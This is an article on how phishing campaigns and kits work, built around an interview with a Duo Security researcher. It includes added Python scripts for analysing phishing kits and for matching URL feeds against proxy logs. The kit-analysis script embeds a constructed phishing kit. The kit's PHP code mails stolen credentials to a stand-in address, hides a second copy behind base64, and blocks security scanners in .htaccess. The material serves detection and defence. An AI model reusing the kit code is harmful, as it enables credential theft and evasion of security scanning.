How phishers phish

If you believe the hype, the world’s cyber criminals have huge collections of as-yet-unknown zero-day vulnerabilities hidden away, waiting to unleash on the world.

But Steve Manzuik, Director of Security Research at Michigan-based security startup Duo Security, says that in reality this is just not the case.

“Attackers are pretty lazy; they're not going to do things if they don't have to. If phishing is working, why wouldn't they keep doing it?”


The phishing problem

The rewards for finding a genuine zero-day vulnerability can be extremely high, but that is because finding one is extremely difficult, and a zero-day often has only a limited window of usefulness once it has been used.

“The skill required to play in this field is quite high. The skill required to do a phishing campaign is quite low. You can literally spend six months looking for that million-dollar iPhone bug and not find anything. And there's no point burning any zero days they do have if the phishing is working, so a lot of attackers don't bother playing in this area.”

“We've seen evidence that phishers were watching YouTube videos on how to use the tools right before they launched the phishing campaign. It's literally that easy to do a phishing campaign.”

And phishing is working.

Duo Security’s phishing drills found that 44% of emails were opened, and nearly half of those yielded at least one credential, which in a real attack is enough to start trying to get inside a company. A report from Cofense found 78% of European and 66% of US IT professionals have dealt with a security incident originating from a deceptive email.

Nearly 1.5 million new phishing sites are created each month, and phishing attempts have grown 65% in the last year. According to a new study from Recorded Future, exploits involving Microsoft Office – i.e. the kind you embed into documents and then email to targets – were one of the most popular choices for attackers last year. A successful phishing attack costs a mid-sized enterprise on average around $1.6 million.


The automation and standardization of phishing campaigns

“There was a time it was very easy to spot a phishing email: poor grammar, broken sentences, weird characters in the email, there'd be all kinds of things that would tip you off,” says Manzuik. “Whereas today they're good enough that even seasoned security professionals are getting fooled.”

Part of this improvement in campaign quality is down to greater levels of professionalization and cooperation between cybercriminals.

“We’re seeing a lot more formalization in the building of attack methodologies, frameworks, and phishing kits, and they're sharing them.”

“In the past we would see an attacker build his phishing campaign himself, and they were not very thorough and weren't doing things like encryption or data exfiltration very well. Today we're seeing those methods being cleaned up a lot, we're seeing standard frameworks and methodologies being used.”

The result is that criminals can now launch a whole campaign with just a few clicks.

“The entire process is automated; what the attackers are doing is cloning a legitimate website, adding some PHP code to steal credentials – and smart attackers will redirect you and log you in to your intended site – they then zip everything together, upload it to a compromised web host, run a script that then blasts out all the emails, and they literally sit back and wait.”

“The reason they're doing this is it lowers your overall time to phish. It's amazingly fast to do this; you're literally cutting and pasting and running one command and uploading a file, and you're done. It takes a few minutes out of their day.”

These kits generally come in a modular form that can be assembled to suit the individual campaign’s requirements, and some even include plug-ins that can be bought and integrated, for example to add encryption. Kits are also starting to ship .htaccess files that block access from security companies’ scanners.

This standardization is clearly widespread. An analysis of 66,000 known phishing URLs by Duo found just 3,200 unique phishing kits.

There’s also more intel sharing. If an attacker has collected data – email addresses and company information – for an organization they have no interest in attacking, they may well share that information or sell it to an actor who does want to target that company.


Criminals using social media more, still bad at OpSec

As well as increasing levels of automation, criminals are becoming more sophisticated and patient in their attacks.

“Something we've seen a lot of in the last couple of years is attackers using social media. Sometimes attackers will do something as simple as going on LinkedIn and adding people from a job title – for example SWIFT administrators.”

“Or sometimes what they do is they'll play the long game and actually set up a lot of fake social media profiles - LinkedIn, Facebook etc. - they'll build friend networks and make profiles look as legitimate as possible.”

In this type of attack, Manzuik says, attackers pick a company and job title for their profile that aligns closely with the target, such as a business partner or a potential or current customer, and then reach out to gain trust.

In one example, a campaign targeted executives and started asking questions about security posture: ‘We're a partner, we have this security problem, what are you doing to solve this in your company?’

“The executive, thinking he's being helpful, is handing out information, and corresponding with them,” Manzuik explains.

The relationship ended with a malicious link carrying a key logger being sent and clicked on, but it was caught before any data could be exfiltrated.

“It was your standard key logger, no zero day, nothing really exotic. The reality was it was a very simple and basic attack. But building the target's trust guarantees higher success in their attack.”

While there is an increasing level of ‘professionalization’ in these attacks, criminals are often guilty of ‘bad OpSec’ and mistakes are still being made. Many criminals don’t delete phishing sites, leaving breadcrumbs for researchers to analyze. Encryption is still not always used, so any kits found online can be pulled apart and reverse-engineered. Attackers also leave easily identifiable information, including linked hosts, associated email addresses, and the locations data is being sent to, all of which a company can use to work out who it needs to defend against.

Manzuik also says there is “no honor among thieves” and criminals, being criminals, often attack their own kind. He has seen hundreds of examples of ‘off the shelf’ phishing kits that include undocumented backdoors which send a copy of the harvested data back to the original seller of the kit as well as to the campaign instigator.
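The kit anatomy described above (a cloned page, a PHP handler that mails the credentials and redirects the victim, an .htaccess that turns scanners away), Duo's deduplication of 66,000 URLs into 3,200 kits, and the breadcrumbs and backdoors in the last two paragraphs all come down to the same job: pull the archive apart and read it. The script below is an added example written for this page; it is not Duo's Phish Collect or any kit author's code. The kit it analyses is constructed inline, and every address, host and IP prefix in it is made up. It goes slightly beyond the text by resolving `$variable` recipients and decoding a recipient hidden behind `base64_decode()`, a common way of concealing the seller's copy.

```python
import base64
import hashlib
import io
import re
import zipfile

# Constructed kit (not a real one): a cloned login form, a PHP handler that
# mails the credentials and redirects to the real site, and an .htaccess that
# blocks scanners. The second mail() call is the seller's backdoor: its
# recipient is hidden behind base64_decode() so a casual reader misses it.
HIDDEN = base64.b64encode(b"kit-author@example.org").decode()
KIT_FILES = {
    "kit/index.html": '<form method="post" action="post.php">...</form>',
    "kit/post.php": (
        "<?php\n"
        "$to = 'dropbox.campaign@example.net';\n"
        "$msg = 'user='.$_POST['user'].'&pass='.$_POST['pass'];\n"
        "mail($to, 'Result', $msg);\n"
        f"mail(base64_decode('{HIDDEN}'), 'copy', $msg);\n"
        "header('Location: https://login.example.com/');\n"
    ),
    "kit/.htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} (googlebot|phishtank|netcraft) [NC]\n"
        "RewriteRule .* - [F]\n"
        "deny from 66.249.\n"
        "deny from 209.85.\n"
    ),
}

MAIL_CALL = re.compile(r"\bmail\s*\(\s*([^,]+?)\s*,", re.I)
ASSIGN = re.compile(r"""(\$\w+)\s*=\s*['"]([^'"]+)['"]\s*;""")
STR_LIT = re.compile(r"""^['"]([^'"]+)['"]$""")
B64_ARG = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""", re.I)
REDIRECT = re.compile(r"""header\s*\(\s*['"]Location:\s*([^'"]+)['"]""", re.I)
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def build_kit_zip(files):
    """Zip a {path: text} mapping in memory; stands in for a downloaded kit."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in files.items():
            zf.writestr(name, text)
    return buf.getvalue()

def mail_recipients(php):
    """Resolve the first argument of every mail() call: literals and $variable
    assignments are 'declared'; an address only visible after base64 is 'hidden'."""
    variables = dict(ASSIGN.findall(php))
    declared, hidden = [], []
    for arg in MAIL_CALL.findall(php):
        arg = arg.strip()
        if (lit := STR_LIT.match(arg)):
            declared.append(lit.group(1))
        elif arg in variables:
            declared.append(variables[arg])
        elif (b64 := B64_ARG.search(arg)):
            try:
                decoded = base64.b64decode(b64.group(1), validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if EMAIL.fullmatch(decoded):
                hidden.append(decoded)
    return {"declared": declared, "hidden": hidden}

def scanner_blocks(htaccess):
    """User-agent tokens and IP prefixes the kit's .htaccess refuses to serve."""
    agents, prefixes = [], []
    for line in htaccess.splitlines():
        ua = re.match(r"RewriteCond\s+%\{HTTP_USER_AGENT\}\s+(\S+)", line.strip(), re.I)
        deny = re.match(r"deny\s+from\s+(\S+)", line.strip(), re.I)
        if ua:
            agents.extend(ua.group(1).strip("()").split("|"))
        if deny:
            prefixes.append(deny.group(1))
    return {"agents": agents, "prefixes": prefixes}

def kit_fingerprint(files):
    """SHA-256 over sorted (path minus its top-level folder, content hash) pairs,
    so the same kit re-zipped under a new folder name dedups to one fingerprint."""
    entries = []
    for name, data in files.items():
        rel = name.split("/", 1)[1] if "/" in name else name
        entries.append(f"{rel}:{hashlib.sha256(data).hexdigest()}")
    return hashlib.sha256("\n".join(sorted(entries)).encode()).hexdigest()

def analyse_kit(zip_bytes):
    """Run every check over one archive and return a single report dict."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        files = {i.filename: zf.read(i) for i in zf.infolist() if not i.is_dir()}
    text = lambda ok: "\n".join(d.decode("utf-8", "replace") for n, d in files.items() if ok(n))
    php = text(lambda n: n.lower().endswith(".php"))
    htaccess = text(lambda n: n.rsplit("/", 1)[-1] == ".htaccess")
    report = mail_recipients(php)
    report["redirects"] = REDIRECT.findall(php)
    report.update(scanner_blocks(htaccess))
    report["fingerprint"] = kit_fingerprint(files)
    return report
```

Run it with `analyse_kit(build_kit_zip(KIT_FILES))`: the report lists the campaign's drop address, the seller's hidden copy, the redirect target, and the scanner user-agents and IP ranges the kit refuses. Comparing the fingerprint across kits recovered from different hosts is what separates a widespread hit-and-hope campaign from a one-off built for your company.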


Identifying, understanding, and preventing phishing attacks

So, what can you do to prevent, or at least better deal with, phishing attacks? Manzuik recommends a ‘back to basics’ approach:

Regular backups, encryption, patching, password managers, multi-factor authentication, and proper account privilege management.

“If you're not doing the basics, your shiny technology's not going to prevent a breach.”

Sites such as PhishTank and OpenPhish publish feeds of known phishing URLs which, combined with analysis tools such as Savvius or DomainTools, let you identify malicious domains and block them at your network edge.
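Turning a URL feed into a block decision has a few traps: the host in a phishing link may be disguised with a `user@` prefix, written in upper case or with a port, or spelt with look-alike Unicode letters, and many kits sit in one directory of an otherwise legitimate compromised host, so blocking the whole domain is collateral damage. The script below is an added example written for this page, not PhishTank's, OpenPhish's or Duo's code. It assumes the one-URL-per-line layout OpenPhish uses; the feed and the proxy log lines are constructed, and every host in them is made up.

```python
from urllib.parse import unquote, urlsplit

# Constructed feed in the one-URL-per-line layout OpenPhish publishes. A
# directory entry ("/kit/") covers the whole kit; a file entry covers itself.
FEED = """\
# url
http://evil.example/kit/
https://EVIL.example:443/kit/index.php
http://xn--bcher-kva.example/secure/
"""

# Constructed proxy log: timestamp, client, method, URL. Line 1 hides the real
# host behind a "user@" prefix; line 3 spells the host with a Unicode label.
PROXY_LOG = """\
2018-04-03T09:12:01Z 10.0.0.12 GET https://accounts.google.com@evil.example/kit/login.php
2018-04-03T09:12:05Z 10.0.0.12 GET http://evil.example:80/about.html
2018-04-03T09:13:44Z 10.0.0.31 GET http://bücher.example/secure/login.php?u=x
2018-04-03T09:14:10Z 10.0.0.31 GET https://login.example.com/
"""

def normalise(url):
    """Return (host, path) in the canonical form both sides are compared in.

    urlsplit().hostname already drops userinfo, the port and upper case; on top
    of that strip a trailing dot, convert Unicode labels to punycode so a
    look-alike host matches its xn-- feed entry, and percent-decode the path.
    """
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").rstrip(".")
    try:
        host = host.encode("idna").decode("ascii")
    except UnicodeError:
        pass  # keep the raw host rather than silently dropping the line
    return host, unquote(parts.path) or "/"

def load_feed(text):
    """Index a feed as {host: {path, ...}}; blank lines and # comments skipped."""
    index = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, path = normalise(line)
        if host:
            index.setdefault(host, set()).add(path)
    return index

def lookup(index, url):
    """Return the feed path that blocks this URL, or None.

    A feed path ending in '/' covers everything beneath it; a file path covers
    only itself, so an unrelated page on the same compromised host stays reachable.
    """
    host, path = normalise(url)
    for bad in index.get(host, ()):
        if bad == path or (bad.endswith("/") and path.startswith(bad)):
            return bad
    return None

def flag_log(index, log):
    """Return (client, url, matched_feed_path) for every request the feed blocks."""
    hits = []
    for line in log.splitlines():
        if line.strip():
            _ts, client, _method, url = line.split()[:4]
            matched = lookup(index, url)
            if matched:
                hits.append((client, url, matched))
    return hits
```

Running `flag_log(load_feed(FEED), PROXY_LOG)` flags the disguised `accounts.google.com@evil.example` request and the Unicode `bücher.example` request, while the unrelated page on `evil.example` passes. Feeding the same normalisation to the proxy's deny list, rather than exact-string matching the feed, is what makes the block hold up against the tricks above.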

Duo offers a number of Open Source tools to help spot, report, and analyze phishing attacks:

  • IsThisLegit is a dashboard and Chrome extension that allows Gmail users to send suspected phishing emails to a dashboard
  • Phinn is a Chrome extension that assesses whether a log-in page is legitimate
  • Phish Collect is a Python script designed to hunt down and analyze phishing kits, letting you see whether an attack was targeted at your company or was more of a widespread hit-and-hope


Dan Swinhoe

Dan is Senior Staff Writer at IDG Connect. Writes about all manner of tech from driverless cars, AI, and Green IT to Cloudy stuff, security, and IoT. Dislikes autoplay ads/videos and garbage written about 'millennials'.
